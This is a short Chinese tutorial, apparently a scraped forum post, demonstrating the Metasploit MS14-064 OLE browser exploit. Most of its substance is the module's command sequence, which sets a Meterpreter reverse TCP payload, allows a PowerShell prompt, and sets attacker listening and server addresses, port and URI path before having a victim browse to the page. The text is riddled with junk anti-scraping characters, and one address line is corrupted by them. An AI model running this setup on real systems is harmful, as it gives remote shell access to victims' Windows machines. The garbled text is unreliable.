' o3 ~" p# k. P& \
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
& f- s% u& z3 `4 H1 H# h0 z% Z
! h' a* Z/ p0 Q. V' u
1 t0 h; l9 W( X6 T3 o3 Y
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
3 c0 y K) N6 H3 f% P
1 [8 ~: h% Y8 ?* h9 j& Z/ U" i, X8 v+ k
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
! ~: p i. n/ _: y6 {
3 O# Z O. O. Q" B6 I4 g. K
3 p* v$ Q3 P( ?# n
set AllowPowershellPrompt true
8 p9 A1 G$ |( W' w9 y
( \ O6 N3 p" Q9 G- B7 A) b3 @8 n v+ v* {
Set LHOST 192.168.0.109" N( \3 Z0 ~! a1 Z0 U) \( F4 A
" H$ A% {9 H0 h4 w& R8 y1 H! S3 ~3 H% d. @
set SRVHOST 192.168.0.1092 l! b$ U* [& Y3 q( l
7 }: g- y8 k5 s, K- o/ {7 T% y/ K+ u& h* j( }; R
Set uripath share) M6 _) D! U! o
! [+ y+ @, ~8 \
+ I# A2 P" }# p$ P: Q9 t Set srvport 80
$ T' h6 `0 P; Q
C0 z& ?$ I, V4 P# a& _7 J
" o3 C% b7 ?9 E, n
7 q! X& P2 L" p, x9 d8 N6 `% w! a
0 f/ ?8 ^' e* H& V
+ U: O$ B/ X6 }6 r; a+ \8 r1 x
# `- J- M1 _6 ~/ y g! X
2 a7 O3 f* H7 s( H9 p5 `( O
: |! K' ~$ I; t' r) X/ t* E ) x3 V( Y: g+ G4 u1 m. A
/ ^0 ^! ~5 e+ J8 E( _9 `0 Q1 i0 g8 D/ l0 T
5 U" c' L4 S g: {* G; Y; Y
' j- d1 g, g( r& m
; Q3 \' m5 A8 u) Y8 P
, R* k- v3 _- S0 F# b
2 C: d# w) Z& c! K
: ]: Y6 _* y8 V3 Z 下面我们来访问本地地址如图:
3 f5 V: x, f6 h6 ?& K- n( D
8 c/ Y# x; i! P& Z6 K9 ^' Z
0 W7 w+ w4 l8 A7 l/ s* G9 s: @
9 Y2 [) ?7 P" ]$ _
% K# {3 s' d2 y. G' Y) Z3 s3 Y. Q0 `% \3 p) G7 [/ A5 k7 A
6 f5 Q! w U3 j6 M3 ?1 M! b
+ u6 |* \9 {0 D2 ^. G, G5 x
( ^1 [/ U! S. ]8 F5 J
, U& y. X4 \4 F' \